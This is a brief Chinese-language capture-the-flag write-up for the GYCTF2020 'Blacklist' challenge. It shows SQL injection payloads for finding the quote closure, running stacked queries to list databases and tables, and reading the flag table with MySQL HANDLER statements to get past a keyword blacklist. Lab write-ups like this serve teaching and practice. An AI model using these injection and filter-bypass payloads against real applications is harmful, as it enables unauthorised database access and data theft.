[GYCTF2020]Blacklist 1
1.感觉像是一种注入,blacklist黑名单绕过更具一系列操作可以判断出闭合方式为 1’
通过这句paylaod:1’ union select 1,2# 找到黑名单
2.继续构造payload,1’ or 1=1#,确定了闭合方式
使用接下来的语句 1’;show database;#
3.1’;show tables;#
4.这里有两个表,由于我们被过滤了许多函数,但是handler函数没有被过滤,于是我们运用handler函数来构造payload:
1’;handler FlagHere open;handler FlagHere read first;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next; handler函数运用
handler user open;
handler user read;读出什么输出什么handler user read first [where username=‘admin’]; handler user read next [where username=‘admin’]; – [] 中的内容意味着可加可不加